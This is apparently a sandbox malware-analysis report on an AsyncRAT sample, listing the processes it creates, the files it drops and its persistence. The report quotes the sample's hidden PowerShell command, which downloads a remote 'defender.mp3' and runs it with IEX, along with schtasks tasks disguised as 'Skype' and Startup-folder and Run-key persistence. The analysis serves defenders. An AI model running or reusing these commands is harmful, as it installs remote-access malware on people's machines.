Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\conhost.exe C:\ProgramData\conhost.exe
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown	Process created: C:\ProgramData\conhost.exe 'C:\ProgramData\conhost.exe'
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\conhost.exe 'C:\ProgramData\conhost.exe'
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe'
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Roaming\DVDFabPlayer5Activator.cmd' '
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Users\user\AppData\Roaming\Ne - Copy.exe 'C:\Users\user\AppData\Roaming\Ne - Copy.exe'
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\winlogon.vbs'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe 'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -decode 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp' 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r 'C:\Users\user\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec'
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Process created: C:\ProgramData\conhost.exe C:\ProgramData/conhost.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe
Source: C:\ProgramData\conhost.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe

Source: C:\Users\user\Desktop\xuXIetZvv6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: xuXIetZvv6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: xuXIetZvv6.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: xuXIetZvv6.exe

Static file information: File size 1953792 > 1048576

Source: xuXIetZvv6.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1af800

Source: xuXIetZvv6.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdb source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp
Source:	Binary string: C:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, Ne - Copy.exe, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
Source:	Binary string: EC:\apache_websites\vbsedit\source\launcher\x64\Release\launcher64w.pdb source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp
Source:	Binary string: wshom.pdbUGP source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdb source: wscript.exe, 00000006.00000002.491949295.000002F0A1260000.00000002.00000001.sdmp
Source:	Binary string: wshom.pdb source: wscript.exe, 00000006.00000002.493469022.000002F0A29C0000.00000002.00000001.sdmp, conhost.exe, 00000008.00000002.491259830.000001E6CD650000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491619266.0000027803840000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdbUGP source: conhost.exe, 00000008.00000002.491224519.000001E6CD640000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.491568678.0000027803830000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_000000014009E010 SendMessageW,SendMessageW,SendMessageW,LoadLibraryW,GetProcAddress,SendMessageW,SendMessageW,SendMessageW,

Source: Ne - Copy.exe.0.dr	Static PE information: section name: text
Source: conhost.exe.3.dr	Static PE information: section name: _RDATA
Source: conhost.exe.8.dr	Static PE information: section name: _RDATA
Source: conhost.exe.17.dr	Static PE information: section name: _RDATA
Source: conhost.exe.26.dr	Static PE information: section name: _RDATA
Source: conhost.exe.35.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Code function: 0_2_00007FFA161F0DEE push es; ret
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001401274CB push rbp; iretd
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D7810 push rbp; iretd
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140127F35 push 0000003Eh; ret

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	File created: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Jump to dropped file
Source: C:\ProgramData\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	File created: C:\ProgramData\conhost.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

File created: C:\ProgramData\conhost.exe

Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6920, type: MEMORY
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.unpack, type: UNPACKEDPE

Drops PE files to the startup folder

Show sources

Source: C:\ProgramData\conhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe

Jump to dropped file

Drops VBS files to the startup folder

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\ProgramData\conhost.exe

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 1 /tn Skype /tr 'C:\ProgramData\conhost.exe

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe.manifest	Jump to behavior
Source: C:\ProgramData\conhost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs	Jump to behavior

Source: C:\ProgramData\conhost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VKRYQ2NT1P			Jump to behavior
Source: C:\ProgramData\conhost.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run VKRYQ2NT1P			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 77
Source: unknown	Network traffic detected: HTTP traffic on port 77 -> 49709

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140050076 IsZoomed,IsIconic,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140058660 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,GetClassNameW,EnumChildWindows,malloc,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140096770 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140096770 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009085D GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009086D MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140090865 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009087B MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009689B ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140096891 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400908BF MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400448D0 IsWindow,DestroyWindow,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDesktopWindow,GetWindowRect,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,IsWindow,CreateWindowExW,SendMessageW,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400968C6 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400968F8 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400908F7 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140090906 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009694A ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009699C ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400569B0 SendMessageW,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400929C0 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetClientRect,MulDiv,MulDiv,_wcstoi64,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400969C7 MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EA20 SendMessageW,MulDiv,MulDiv,COMRefPtr,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,MapWindowPoints,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400B0AF0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009CC50 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400B0CD0 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140068FF0 GetTickCount,GetForegroundWindow,GetTickCount,GetWindowThreadProcessId,GetGUIThreadInfo,ClientToScreen,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_itow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400531B0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,SelectObject,DeleteDC,DeleteObject,malloc,GetPixel,ReleaseDC,malloc,malloc,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400AD300 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400A1420 CheckMenuItem,CheckMenuItem,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetForegroundWindow,GetWindowThreadProcessId,SetForegroundWindow,SetForegroundWindow,TrackPopupMenuEx,PostMessageW,GetForegroundWindow,SetForegroundWindow,
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140079DE0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,malloc,malloc,

Source: C:\Users\user\Desktop\xuXIetZvv6.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cacls.exe 'C:\Windows\system32\cacls.exe' 'C:\Windows\system32\config\system'

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
